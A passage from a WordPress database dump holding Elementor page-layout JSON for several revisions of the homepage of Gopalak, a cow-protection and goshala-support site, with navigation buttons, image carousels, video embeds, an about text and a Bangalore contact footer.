here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10429,1737,'_elementor_page_assets','a:0:{}'),(10431,1738,'_elementor_edit_mode','builder'),(10432,1738,'_elementor_template_type','wp-page'),(10433,1738,'_elementor_version','3.7.8'),(10434,1738,'_wp_page_template','elementor_canvas'),(10435,1738,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10436,1738,'_elementor_page_assets','a:0:{}'),(10438,1739,'_elementor_edit_mode','builder'),(10439,1739,'_elementor_template_type','wp-page'),(10440,1739,'_elementor_version','3.7.8'),(10441,1739,'_wp_page_template','elementor_canvas'),(10442,1739,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"i